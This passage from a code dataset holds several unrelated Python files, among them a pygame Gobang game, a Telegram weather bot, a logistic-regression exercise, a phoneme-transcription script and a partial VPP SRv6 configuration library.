1/FPS\nelapsed = 0 #Temps écoulé\nstartloop = time.time() \n\ndef upPos():\n if vaisseau.x < vaisseau.photo.width()/2:\n setSpeedScrollX(-vaisseau.speedX)\n elif vaisseau.x > frame.frameW - vaisseau.photo.width():\n setSpeedScrollX(-vaisseau.speedX)\n else:\n setSpeedScrollX(0)\n\n if vaisseau.y < vaisseau.photo.height()/2:\n setSpeedScrollY(-vaisseau.speedY)\n elif vaisseau.y > frame.frameH + vaisseau.photo.height():\n setSpeedScrollY(-vaisseau.speedY)\n else:\n setSpeedScrollY(0)\n \nwhile True:\n #Le temps qu'il s'est écoulé depuis le dernier tour de boucle\n delta = time.time()-startloop\n startloop = time.time()\n \n increaseTime=frame.time.get()*2.628e6 #Convertie les mois en secondes\n frame.univers.delete('all')\n \n #Parcours tous les objets, les actualise et les affiche\n for i in range(len(objects)):\n obj = objects[i]\n obj.move(delta*increaseTime)\n frame.draw(obj)\n frame.setInfos(round(vaisseau.x), round(vaisseau.y), elapsed)\n \n TRC = PFD(vaisseau, objects, soleil)\n #On convertie le TRC qui est en mètre en km\n vaisseau.accelX = convertDist(TRC[0]*10**-3)\n vaisseau.accelY = convertDist(TRC[1]*10**-3)\n \n upPos()\n \n #Si l'utilisateur a cliqué affiche les infos de la planète\n if getClicked():\n infoPlanet = getInfoPlanet(getPlanetClicked(objects, getMousePos()))\n #S'il n'a pas cliqué en dehors d'une planète \n if infoPlanet != None:\n frame.createPopup(infoPlanet)\n setClicked(False)\n \n frame.frame.update()\n time.sleep(sleepTime)\n elapsed += delta*increaseTime\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"355930040","text":"# -*- coding: utf-8 -*-\nimport sys\nsys.dont_write_bytecode = True\ndef cmp_dict(src_data,dst_data):\n # 比较两个字典是否完全一致,若一致返回True\n flag = True\n if not (type(src_data) == type(dst_data)):\n flag = False\n else:\n if isinstance(src_data,dict):\n if not (len(src_data) == len(dst_data)):\n flag = False\n else:\n for key in src_data:\n if not dst_data.has_key(key):\n flag = False\n break\n else:\n flag = (flag and cmp_dict(src_data[key],dst_data[key]))\n\n elif isinstance(src_data,list):\n if not (len(src_data) == len(dst_data)):\n flag = False\n else:\n for src_list, dst_list in zip(sorted(src_data), sorted(dst_data)):\n flag = (flag and cmp_dict(src_list, dst_list))\n if not flag:\n break\n else:\n if not (src_data == dst_data):\n flag = False\n return flag\n\ndef get_diff_keys(cover_keys,cmp_dict,current_dict):\n # 不同模型参数比较,参数相同的键放入same_keys中,不同的放入diff_keys,便于csv文件中参数顺序的排列\n cmp_keys = cmp_dict.keys()\n current_keys = current_dict.keys()\n diff_keys = []\n same_keys = []\n for key in cover_keys:\n if (key in cmp_keys) and (key in current_keys):\n if cmp_dict[key] == current_dict[key]:\n same_keys.append(key)\n else:\n diff_keys.append(key)\n else:\n diff_keys.append(key)\n return diff_keys,same_keys","sub_path":"remodet_repository_wdh_part/Projects/PyLib/Utils/dict.py","file_name":"dict.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"196153343","text":"# Name : Gobang game \n# Author : simon \n# e-mail : 2441873702@qq.com\n# Date : 2020.05.27 19:02\n# version: v3\n# http://www.pyinstaller.org/downloads.html\n# http://www.ico51.cn/ \n# bug 1 : 当鼠标点击到画布棋盘外仍可显示棋子 ———— fixed\n# bug 2 : 棋子会覆盖之前已经绘制的位置 ———— fixed\n# bug 3 : 棋子数量达到一定时,不会判定结果\n\n\nimport pygame\nimport pygame.freetype\n\n\n# fps setting\nfps = 300\n\n# default str value\nsize = width, height = 800, 600\nborder = 50 \nwlc_str = \"Welcom to gobang game!\"\nsuccessor = \"\"\n\n# default color\nbg_color = (128,138,135)\t#pygame.Color(\"white\")\nline_color = 0,0,0\n\n# chess color\nWHITE = 255,255,255\nBLACK = 0,0,0\nfont_color = 0,0,0\n\npygame.init()\nfclock = pygame.time.Clock()\n# pygame Surface\nscreen = pygame.display.set_mode(size, pygame.RESIZABLE)\nbackground = pygame.Surface(screen.get_size())\ncaption = \"Gobang Game\"\npygame.display.set_caption(caption)\nicon = pygame.image.load('gobang_logo.png')\npygame.display.set_icon(icon)\n\n\ndef draw_font(background, string='Hello pygame!',font_size=20, positon=(0,0)):\n\t# font_type = pygame.freetype.Font('C://Windows//Fonts//msyh.ttc', 1)\n\tfont_type = pygame.freetype.Font('./consola.ttf', 1)\t\n\tfont_rect = font_type.render_to(background, positon, string, fgcolor=font_color, size=font_size)\n\tscreen.blit(background, (0, 0))\n\ndef draw_chessboard_rect(background, rect_point, border):\n\tx_num = int((width - 1.5 * border) / border)\n\ty_num = int((height - 1.5 * border) / border)\n\tfor num_w in range(x_num):\n\t\tfor num_h in range(y_num):\n\t\t\trect_point.append([num_w*border + 50, num_h*border + 50])\n\tfor item in rect_point:\n\t\ts_rect = item[0], item[1], border, border\n\t\tpygame.draw.rect(background, line_color, s_rect, 1)\n\treturn rect_point\n\ndef success(positon):\n\tfor item in positon:\n\t\t# 行\n\t\tif [item[0]+1,item[1]] in positon:\n\t\t\tif [item[0]+2,item[1]] in positon:\n\t\t\t\tif [item[0]+3,item[1]] in positon:\n\t\t\t\t\tif ([item[0]+4,item[1]] in positon):\n\t\t\t\t\t\t# print(\"success!\")\n\t\t\t\t\t\treturn True\n\t\t# 列\n\t\telif [item[0],item[1]+1] in positon:\n\t\t\tif [item[0],item[1]+2] in positon:\n\t\t\t\tif [item[0],item[1]+3] in positon:\n\t\t\t\t\tif [item[0],item[1]+4] in positon:\n\t\t\t\t\t\treturn True\n\t\t# 对角\n\t\telif [item[0]+1,item[1]+1] in positon:\n\t\t\tif [item[0]+2,item[1]+2] in positon:\n\t\t\t\tif [item[0]+3,item[1]+3] in positon:\n\t\t\t\t\tif [item[0]+4,item[1]+4] in positon:\n\t\t\t\t\t\t# print(\"success!\")\n\t\t\t\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\ndef success_judge(chess_dict):\n\tblack_pos = []\n\twhite_pos = []\n\tglobal successor\n\t# print(chess_dict)\n\t# {'10,4': 2, '10,5': 1, '6,4': 2, '6,5': 1, '8,7': 2, '5,7': 1, '6,9': 2, '9,4': 1, '9,6': 2, '10,8': 1}\n\tfor item in chess_dict:\n\t\tx = item.split(\",\", 1)\n\t\tif chess_dict[item] == 1:\n\t\t\twhite_pos.append([int(x[0]),int(x[1])])\n\t\telse:\n\t\t\tblack_pos.append([int(x[0]),int(x[1])])\n\t\n\tprint(\"white_pos = \", white_pos)\n\tprint(\"black_pos = \", black_pos)\n\n\tif success(white_pos):\n\t\tsuccessor = \"white\"\n\t\treturn True\n\telif success(black_pos):\n\t\tsuccessor = \"black\"\n\t\treturn True\n\telse:\n\t\treturn False\n\"\"\"\n\t\tif success(white_pos):\n\t\t\tsuccessor = \"white\"\n\t\t\treturn True\n\t\t\tcontinue\n\t\telif success(black_pos):\n\t\t\tsuccessor = \"black\"\n\t\t\treturn True\n\t\t\tcontinue\n\"\"\"\n\ndef game_over(background, delay_time):\n\timport time,sys\n\tdraw_font(background, string=\"game 
over!\")\n\ttime.sleep(delay_time)\n\tsys.exit()\n\n\n# put chess down \ndef chess_down(background, position, color):\n\tpygame.draw.circle(background, color, position, 20, 0)\n\n\n\nmouse_pos = []\nblack_position = []\nwhite_position = []\nkey_flag = 0\nendflag = False\nwhile True:\n\t# event manage\n\tfor event in pygame.event.get():\n\t\t# quit\n\n\t\tif event.type == pygame.QUIT:\n\t\t\tgame_over(background, 0.3)\n\t\t\t\n\t\telif event.type == pygame.KEYDOWN:\n\t\t\tif event.key == pygame.K_ESCAPE:\n\t\t\t\tgame_over(background, 0.1)\n\n\t\t# elif event.type == pygame.KEYDOWN:\n\t\t# \tif event.key == 'K_RETURN':\n\t\t# \t\tendflag = 0\n\t\t# window resize\n\t\telif event.type == pygame.VIDEORESIZE:\n\t\t\tsize = width, height = event.size[0], event.size[1]\n\t\t\tscreen = pygame.display.set_mode(size, pygame.RESIZABLE)\n\t\t\tbackground = pygame.Surface(screen.get_size())\n\t\telif endflag:\n\t\t\tcontinue\n\t\telif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\tmouse_pos.append([event.pos[0],event.pos[1]])\t# .pos --> tuple = (x_pos,y_pos)\n\n\trect_point = []\n\tbackground.fill(bg_color)\n\tdraw_chessboard_rect(background, rect_point, border)\n\tdraw_font(background, string=wlc_str)\n\n\tchess_dict = {}\n\tcount = 0\n\tfor position in mouse_pos:\n\t\t# position calculate:\n\t\tposition[0] = round(position[0] / 50) * 50\n\t\tposition[1] = round(position[1] / 50) * 50\n\n\t\tif (width//50 > round(position[0]/50) > 0) and (height//50 > round(position[1]//50) > 0):\n\t\t\tkey = str(position[0]//50)+\",\"+str(position[1]//50)\n\t\t\t# print(key)\n\t\t\t# flags \n\t\t\t# 0 -- no\n\t\t\t# 1 -- white\n\t\t\t# 2 -- black\n\n\t\t\tif key not in chess_dict:\n\t\t\t\tkey_flag = 1\n\t\t\t\t# flags = 0\n\t\t\t\tif count % 2 == 0:\n\t\t\t\t\tchess_color = BLACK\n\t\t\t\t\tflags = 2\n\t\t\t\telse:\n\t\t\t\t\tchess_color = WHITE\n\t\t\t\t\tflags = 1\n\t\t\t\tcount = count + 1\n\t\t\t\t# 归一化\n\t\t\t\tnew_dict = {key : flags}\n\t\t\t\tchess_dict.update(new_dict)\n\t\t\t\tchess_down(background, position, chess_color)\n\t\t\telse:\n\t\t\t\tkey_flag = 0\n\tprint(chess_dict)\n\tendflag = success_judge(chess_dict)\t# judgement advancement to fix bug 3\n\tif endflag:\n\t\tdraw_font(background, string=\"Congradulations! \"+successor+\" wins!\",font_size=20, positon=(300,20))\n\t\t# endflag = success_judge(chess_dict)\t\t# error bug 3\n\t# endflag = success_judge(chess_dict)\t\t\t# error bug 3\n\n\n\n\tscreen.blit(background, (0,0))\n\tfclock.tick(fps)\n\tpygame.display.update()\n\n","sub_path":"gobang/Gobang_v1.3.py","file_name":"Gobang_v1.3.py","file_ext":"py","file_size_in_byte":5546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"248242750","text":"#using for test case when need . complete empty py.\n'''\nurl = \"http://zombie-bites.com/j/df\"\nprint(url.split(\"//\")[-1].split('www.')[-1].split('.')[0] )\n'''\ns='Hello world. ooo'\nprint(s.count('o'))\n\nprint(ord('a'), ord('b'))\nprint(ord('A'), ord('B'))\nlist =[1,2,3,4,8,6]\nlist.sort()\nprint(list)\ns1 ='one two three'\nlist = s1.split()\nprint(list)\nmax= 0\nfor c in list:\n if len(c)>max:\n max = len(c)\nfor c in range(len(list)-1,-1,-1):\n if len(list[c]) ==max:\n print(list[c])\n break\nprint(ord('a')-96)\n\nprint(ord('a'),ord('A'))","sub_path":"python/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"393983667","text":"from telegram.ext import Updater, CommandHandler, MessageHandler, Filters\r\nimport os\r\nimport requests\r\nfrom pymongo import MongoClient\r\n\r\nDARKSKY_TOKEN = os.environ.get(\"DARKSKY_API_KEY\")\r\nTELEGRAM_TOKEN = os.environ.get(\"BOT_KEY\")\r\nDB_NAME = os.environ.get(\"MONGO_DB\")\r\nPORT = os.environ.get(\"PORT\")\r\nrepo = MongoClient(os.environ.get(\"MONGODB_URI\"))\r\n\r\nos.system('python -m http.server {} &'.format(PORT))\r\n\r\nstartText = \"Olá eu sou o AtmoBot, existo para providenciar dados e informações sobre o local que você providenciar. Para usar apenas mande uma menssagem de localização com o local de procura.\"\r\n\r\nmessageFormat_br = \"\"\"> Informações Atuais:\r\n{sum}\r\nVento: {wind} m/s {wind_speed_warn_now}\r\nTemperatura: {temp} ºC \r\nHumidade: {umid} g/m³\r\nVisibilidade: {visi} km\r\nChuva: {rain} % de chance\r\n\r\n> Informações Dia:\r\n{sum_day}\r\nVento: {wind_day} m/s {wind_speed_warn_day}\r\nTemperatura Maxima: {temp_day} ºC \r\nHumidade: {umid_day} g/m³\r\nVisibilidade: {visi_day} km\r\nChuva: {rain_day} % de chance\r\n\r\nRestrições Aéreas:\r\n\t- \"\"\"\r\n\r\nmessageFormat_en = \"\"\"> Current Data:\r\n{sum}\r\nWind: {wind} m/s {wind_speed_warn_now}\r\nTemperature: {temp} ºC \r\nHumidity: {umid} g/m³\r\nVisibility: {visi} km\r\nRain: {rain} %\r\n\r\n> Day Data:\r\n{sum_day}\r\nWind: {wind_day} m/s {wind_speed_warn_day}\r\nMax Temperature: {temp_day} ºC \r\nHumidity: {umid_day} g/m³\r\nVisibility: {visi_day} km\r\nRain: {rain_day} %\r\n\r\nAerial Restriction:\r\n\t- \"\"\"\r\n\r\nmessageFormat_us = \"\"\"> Current Data:\r\n{sum}\r\nWind: {wind} mph {wind_speed_warn_now}\r\nTemperature: {temp} ºF \r\nHumidity: {umid} gr/ft3\r\nVisibility: {visi} miles\r\nRain: {rain} %\r\n\r\n> Day Data:\r\n{sum_day}\r\nWind: {wind_day} mph {wind_speed_warn_day}\r\nMax Temperature: {temp_day} ºF \r\nHumidity: {umid_day} gr/ft3\r\nVisibility: {visi_day} miles\r\nRain: {rain_day} %\r\n\r\nAerial Restriction:\r\n\t- \"\"\"\r\n\r\ndef start(update, context):\r\n context.bot.send_message(chat_id=update.message.chat_id, text=startText)\r\n\r\ndef exit(update, context):\r\n context.bot.send_message(chat_id=update.message.chat_id, text=\"Shutting Down...\")\r\n exit(9)\r\n raise SystemExit\r\n\r\nupdater = Updater(token=TELEGRAM_TOKEN, use_context=True)\r\ndispatcher = updater.dispatcher\r\nstart_handler = CommandHandler('start', start)\r\nexit_handler = CommandHandler('exit', exit)\r\ndispatcher.add_handler(start_handler)\r\ndispatcher.add_handler(exit_handler)\r\n\r\ndef lang(update, context):\r\n message = update.message\r\n if message.text == \"/lang\":\r\n context.bot.send_message(chat_id=update.message.chat_id, text=\"/lang {EN/PT/US}\")\r\n return\r\n if context.args[0].lower() == \"en\":\r\n repo[DB_NAME].users.update_one({'name': message.from_user.username},{'$set': {'name': message.from_user.username,'lang': 'en', 'units': 'si'}}, upsert=True)\r\n context.bot.send_message(chat_id=update.message.chat_id, text=\"Set to EN\")\r\n if context.args[0].lower() == \"us\":\r\n repo[DB_NAME].users.update_one({'name': message.from_user.username},{'$set': {'name': message.from_user.username,'lang': 'en', 'units': 'us'}}, upsert=True)\r\n context.bot.send_message(chat_id=update.message.chat_id, text=\"Set to US\")\r\n if context.args[0].lower() == \"pt\":\r\n repo[DB_NAME].users.update_one({'name': message.from_user.username},{'$set': {'name': message.from_user.username,'lang': 'pt', 'units': 'si'}}, upsert=True)\r\n 
context.bot.send_message(chat_id=update.message.chat_id, text=\"Em Português.\")\r\n\r\n\r\ndef location(update, context):\r\n message = update.message\r\n request_data = {\r\n 'api_key': DARKSKY_TOKEN,\r\n 'latitude': message.location.latitude,\r\n 'longitude': message.location.longitude\r\n }\r\n\r\n message_log = {\r\n 'user': message.from_user.username,\r\n 'timestamp': message.date.timestamp(),\r\n 'lat': message.location.latitude,\r\n 'lon': message.location.longitude\r\n }\r\n\r\n userData = repo[DB_NAME].users.find_one({'name': message.from_user.username})\r\n params_query = {'units':'si', 'lang': 'pt'} \r\n if userData:\r\n params_query= userData\r\n\r\n requestURL = \"https://api.darksky.net/forecast/{api_key}/{latitude},{longitude}\".format_map(request_data)\r\n print(requestURL)\r\n r = requests.get(requestURL, params=params_query)\r\n\t\r\n if r.status_code == 200:\r\n datanow = r.json()[\"currently\"]\r\n dataday = r.json()[\"daily\"][\"data\"]\r\n print(dataday[0])\r\n selectData = {\r\n 'sum': datanow[\"summary\"],\r\n 'temp': datanow[\"temperature\"],\r\n 'rain': datanow[\"precipProbability\"] * 100,\r\n 'umid': datanow[\"humidity\"],\r\n 'wind': datanow[\"windSpeed\"],\r\n 'visi': datanow[\"visibility\"],\r\n 'sum_day': dataday[0][\"summary\"],\r\n 'temp_day': dataday[0][\"temperatureHigh\"],\r\n 'rain_day': dataday[0][\"precipProbability\"] * 100,\r\n 'umid_day': dataday[0][\"humidity\"],\r\n 'wind_day': dataday[0][\"windSpeed\"],\r\n 'visi_day': dataday[0][\"visibility\"],\r\n \"wind_speed_warn_now\": \"\",\r\n \"wind_speed_warn_day\": \"\"\r\n }\r\n \r\n c_mesg = messageFormat_br\r\n if userData[\"lang\"] == 'pt':\r\n c_mesg = messageFormat_br\r\n if userData[\"lang\"] == 'en':\r\n c_mesg = messageFormat_en\r\n if userData[\"units\"] == 'us':\r\n c_mesg = messageFormat_us \r\n \r\n if userData[\"units\"] == 'si':\r\n if int(selectData[\"wind\"]) >= 10:\r\n selectData.update({\"wind_speed_warn_now\": \"\"})\r\n if int(selectData[\"wind_day\"]) >= 10:\r\n selectData.update({\"wind_speed_warn_day\": \"\"})\r\n else:\r\n if int(selectData[\"wind\"]) >= 21:\r\n selectData.update({\"wind_speed_warn_now\": \"\"})\r\n if int(selectData[\"wind_day\"]) >= 21:\r\n selectData.update({\"wind_speed_warn_day\": \"\"})\r\n \r\n context.bot.send_message(chat_id=update.message.chat_id, text=c_mesg.format_map(selectData))\r\n repo[DB_NAME].logs.insert_one(message_log)\r\n\t\r\nlocation_handler = MessageHandler(Filters.location, location)\r\ndispatcher.add_handler(location_handler)\r\n\r\nlang_handler = CommandHandler('lang', lang)\r\ndispatcher.add_handler(lang_handler)\r\n\r\nupdater.start_polling()\r\n\r\n\r\n","sub_path":"Atmobot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"29717732","text":"import os\n\ndocs = ['dev_guide', 'user_guide']\n\n\ndef test_that_docs_are_installed():\n for doc in docs:\n assert os.path.exists('/opt/venvs/zenterio-zk2/doc/{doc}/pdf/{doc}.pdf'.format(\n doc=doc)), 'PDF for {doc} was not installed'.format(doc=doc)\n assert os.path.exists('/opt/venvs/zenterio-zk2/doc/{doc}/html/index.html'.format(\n doc=doc)), 'HTML for {doc} was not installed'.format(doc=doc)\n","sub_path":"k2/systest/debtest/doc.py","file_name":"doc.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"477739910","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport h5py\nimport scipy\nfrom PIL import Image\nfrom scipy import ndimage\nfrom week2.lr_utils import load_dataset\n\n\ndef sigmoid(z):\n \"\"\"\n Compute the sigmoid of z\n\n Arguments:\n z -- A scalar or numpy array of any size.\n\n Return:\n s -- sigmoid(z)\n \"\"\"\n\n s = 1/(1 + np.exp(-z))\n return s\n\n\ndef initialize_with_zeros(dim):\n \"\"\"\n This function creates a vector of zeros of shape (dim, 1) for w and initializes b to 0.\n\n Argument:\n dim -- size of the w vector we want (or number of parameters in this case)\n\n Returns:\n w -- initialized vector of shape (dim, 1)\n b -- initialized scalar (corresponds to the bias)\n \"\"\"\n\n w = np.zeros((dim, 1))\n b = 0\n\n assert (w.shape == (dim, 1))\n assert (isinstance(b, float) or isinstance(b, int))\n\n return w, b\n\ntrain_set_x_orig, train_set_y, test_set_x_orig, test_set_y, classes = load_dataset()\n\nm_train = train_set_y.shape[1] # 209 training examples\nm_test = test_set_y.shape[1] # 50 Testing examples\nnum_px = train_set_x_orig.shape[1] # 64 by 64 by 3\n\n### START CODE HERE ### (≈ 2 lines of code)\ntrain_set_x_flatten = train_set_x_orig.reshape(train_set_x_orig.shape[0], -1).T\ntest_set_x_flatten = test_set_x_orig.reshape(test_set_x_orig.shape[0], -1).T\n### END CODE HERE ###\n\nprint(\"train_set_x_flatten shape: \" + str(train_set_x_flatten.shape))\nprint(\"train_set_y shape: \" + str(train_set_y.shape))\nprint(\"test_set_x_flatten shape: \" + str(test_set_x_flatten.shape))\nprint(\"test_set_y shape: \" + str(test_set_y.shape))\nprint(\"sanity check after reshaping: \" + str(train_set_x_flatten[0:5,0]))\nprint(\"sigmoid([0, 2]) = \" + str(sigmoid(np.array([0,2]))))\n\ndim = 2\nw, b = initialize_with_zeros(dim)\nprint (\"w = \" + str(w))\nprint (\"b = \" + str(b))\n\nprint('done')\n","sub_path":"week2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"338548993","text":"\n# coding: utf-8\n\nimport os\nimport pandas as pd\nimport numpy as np\nimport cmudict\nimport nltk\n\nnltk.download('punkt')\nprondict = cmudict.dict()\ndir_path = os.path.abspath('.')\nexl_path = dir_path + r'/sum_100.csv'\nprint(exl_path)\ndf = pd.read_csv(exl_path,engine='python',keep_default_na=False)\n\nstr_list= []\npro_origin_list =[]\npro_result_list = []\nsame_list = []\nchar_rep_rate_list =[]\nchar_full_list = []\n\ndef split_tran(txt):\n txt_revise = txt.replace(\",\", '').replace(\".\", '')\n split_result = nltk.word_tokenize(txt_revise)\n for i in range(len(split_result)):\n split_result[i] = prondict[split_result[i].lower()]\n if split_result[i]:\n split_result[i] = split_result[i][0]\n return split_result\n\ndef list_str(list_tmp):\n result_str = \"\"\n for i in range(len(list_tmp)):\n str_tmp = [str(j) for j in list_tmp[i]]\n str_join_tmp = ' '.join(str_tmp)\n result_str = result_str + \" \" + str_join_tmp\n return result_str\n\nfor index, row in df.iterrows():\n list_origin = split_tran(row[\"Origin\"])\n list_result = split_tran(row[\"Result\"])\n\n pro_origin_list.append(list_str(list_origin))\n pro_result_list.append(list_str(list_result))\n # str_tmp = ''\n # if row[\"Origin\"] == row[\"Result\"]:\n # same_list.append(1)\n # else:\n # same_list.append(0)\n #\n # for i in row['Result']:\n # for j in row['Origin'].lower():\n # if i == j:\n # str_tmp = ''.join([str_tmp,i])\n # break\n # str_diff_tmp = ''.join([str_tmp,i])\n # # char_full_list.append(0)\n # # break\n # # print(str_tmp)\n # str_list.append(str_tmp)\n # if str_tmp == row['Result']:\n # char_full_list.append(1)\n # else:\n # char_full_list.append(0)\n # char_rep_rate = len(str_tmp.replace(\" \", \"\"))/len(str(row['origin']).replace(\" \", \"\"))\n # char_rep_rate_list.append(char_rep_rate)\ndf['pro_origin'] = pro_origin_list\ndf['pro_result'] = pro_result_list\n# df['same'] = same_list\n# df['align'] = str_list\n\n# same_number = len(df[df['same'].isin(1)])\n# df['char_rate'] = char_rep_rate_list\n# df['char_full'] = char_full_list\n\ndf.to_csv('result_100.csv')\n","sub_path":"code/process/pho_tran.py","file_name":"pho_tran.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"606662046","text":"# Copyright (c) 2017 Cisco and/or its affiliates.\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at:\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Segment Routing over IPv6 dataplane utilities library.\"\"\"\n\nfrom enum import Enum\n\nfrom resources.libraries.python.VatExecutor import VatTerminal\nfrom resources.libraries.python.VatJsonUtil import VatJsonUtil\nfrom resources.libraries.python.topology import Topology\n\n\nclass SRv6Behaviour(Enum):\n \"\"\"Defines SRv6 endpoint functions implemented in VPP.\"\"\"\n # Endpoint function\n END = 'end'\n # Endpoint function with Layer-3 cross-connect\n END_X = 'end.x'\n # Endpoint with decapsulation and Layer-2 cross-connect\n END_DX2 = 'end.dx2'\n # Endpoint with decapsulation and IPv4 cross-connect\n END_DX4 = 'end.dx4'\n # Endpoint with decapsulation and IPv4 table lookup\n END_DT4 = 'end.dt4'\n # Endpoint with decapsulation and IPv6 cross-connect\n END_DX6 = 'end.dx6'\n # Endpoint with decapsulation and IPv6 table lookup\n END_DT6 = 'end.dt6'\n\n\nclass SRv6(object):\n \"\"\"SRv6 class.\"\"\"\n\n def __init__(self):\n pass\n\n @staticmethod\n def configure_sr_localsid(node, local_sid, behavior, interface=None,\n next_hop=None, fib_table=None):\n \"\"\"Create SRv6 LocalSID and binds it to a particular behaviour on\n the given node.\n\n :param node: Given node to create localSID on.\n :param local_sid: LocalSID IPv6 address.\n :param behavior: SRv6 LocalSID function.\n :param interface: Interface name (Optional, required for\n L2/L3 xconnects).\n :param next_hop: Next hop IPv4/IPv6 address (Optional, required for L3\n xconnects).\n :param fib_table: FIB table for IPv4/IPv6 lookup (Optional, required for\n L3 routing).\n :type node: dict\n :type local_sid: str\n :type behavior: str\n :type interface: str\n :type next_hop: int\n :type fib_table: str\n :raises ValueError: If unsupported SRv6 LocalSID function used or\n required parameter is missing.\n \"\"\"\n if behavior == SRv6Behaviour.END:\n params = ''\n elif behavior in [SRv6Behaviour.END_X, SRv6Behaviour.END_DX4,\n SRv6Behaviour.END_DX6]:\n if interface is None or next_hop is None:\n raise ValueError('Required data missing.\\ninterface:{0}\\n'\n 'next_hop:{1}'.format(interface, next_hop))\n interface_name = Topology.get_interface_name(node, interface)\n params = '{0} {1}'.format(interface_name, next_hop)\n elif behavior == SRv6Behaviour.END_DX2:\n if interface is None:\n raise ValueError('Required data missing.\\ninterface:{0}\\n'.\n format(interface))\n params = '{0}'.format(interface)\n elif behavior in [SRv6Behaviour.END_DT4, SRv6Behaviour.END_DT6]:\n if fib_table is None:\n raise ValueError('Required data missing.\\nfib_table:{0}\\n'.\n format(fib_table))\n params = '{0}'.format(fib_table)\n else:\n raise ValueError('Unsupported SRv6 LocalSID function: {0}'.\n format(behavior))\n\n with VatTerminal(node) as vat:\n resp = vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_localsid_add.vat', local_sid=local_sid,\n behavior=behavior, params=params)\n\n VatJsonUtil.verify_vat_retval(\n resp[0],\n 
err_msg='Create SRv6 LocalSID {0} failed on node {1}'.format(\n local_sid, node['host']))\n\n @staticmethod\n def delete_sr_localsid(node, local_sid):\n \"\"\"Delete SRv6 LocalSID on the given node.\n\n :param node: Given node to delete localSID on.\n :param local_sid: LocalSID IPv6 address.\n :type node: dict\n :type local_sid: str\n \"\"\"\n with VatTerminal(node) as vat:\n resp = vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_localsid_del.vat', local_sid=local_sid)\n\n VatJsonUtil.verify_vat_retval(\n resp[0],\n err_msg='Delete SRv6 LocalSID {0} failed on node {1}'.format(\n local_sid, node['host']))\n\n @staticmethod\n def show_sr_localsids(node):\n \"\"\"Show SRv6 LocalSIDs on the given node.\n\n :param node: Given node to show localSIDs on.\n :type node: dict\n \"\"\"\n with VatTerminal(node) as vat:\n vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_localsids_show.vat')\n\n @staticmethod\n def configure_sr_policy(node, bsid, sid_list, mode='encap'):\n \"\"\"Create SRv6 policy on the given node.\n\n :param node: Given node to create SRv6 policy on.\n :param bsid: BindingSID - local SID IPv6 address.\n :param sid_list: SID list.\n :param mode: Encapsulation / insertion mode.\n :type node: dict\n :type bsid: str\n :type sid_list: list\n :type mode: str\n \"\"\"\n sid_conf = 'next ' + ' next '.join(sid_list)\n\n with VatTerminal(node) as vat:\n resp = vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_policy_add.vat', bsid=bsid,\n sid_conf=sid_conf, mode=mode)\n\n VatJsonUtil.verify_vat_retval(\n resp[0],\n err_msg='Create SRv6 policy for BindingSID {0} failed on node '\n '{1}'.format(bsid, node['host']))\n\n @staticmethod\n def delete_sr_policy(node, bsid):\n \"\"\"Delete SRv6 policy on the given node.\n\n :param node: Given node to delete SRv6 policy on.\n :param bsid: BindingSID IPv6 address.\n :type node: dict\n :type bsid: str\n \"\"\"\n with VatTerminal(node) as vat:\n resp = vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_policy_del.vat', bsid=bsid)\n\n VatJsonUtil.verify_vat_retval(\n resp[0],\n err_msg='Delete SRv6 policy for BindingSID {0} failed on node '\n '{1}'.format(bsid, node['host']))\n\n @staticmethod\n def show_sr_policies(node):\n \"\"\"Show SRv6 policies on the given node.\n\n :param node: Given node to show SRv6 policies on.\n :type node: dict\n \"\"\"\n with VatTerminal(node, json_param=False) as vat:\n vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_policies_show.vat')\n\n @staticmethod\n def configure_sr_steer(node, mode, bsid, interface=None, ip_addr=None,\n mask=None):\n \"\"\"Create SRv6 steering policy on the given node.\n\n :param node: Given node to create steering policy on.\n :param mode: Mode of operation - L2 or L3.\n :param bsid: BindingSID - local SID IPv6 address.\n :param interface: Interface name (Optional, required in case of\n L2 mode).\n :param ip_addr: IPv4/IPv6 address (Optional, required in case of L3\n mode).\n :param mask: IP address mask (Optional, required in case of L3 mode).\n :type node: dict\n :type mode: str\n :type bsid: str\n :type interface: str\n :type ip_addr: int\n :type mask: int\n :raises ValueError: If unsupported mode used or required parameter\n is missing.\n \"\"\"\n if mode == 'l2':\n if interface is None:\n raise ValueError('Required data missing.\\ninterface:{0}\\n'.\n format(interface))\n interface_name = Topology.get_interface_name(node, interface)\n params = 'l2 {0}'.format(interface_name)\n elif mode == 'l3':\n if ip_addr is None or mask is None:\n raise ValueError('Required data missing.\\nIP 
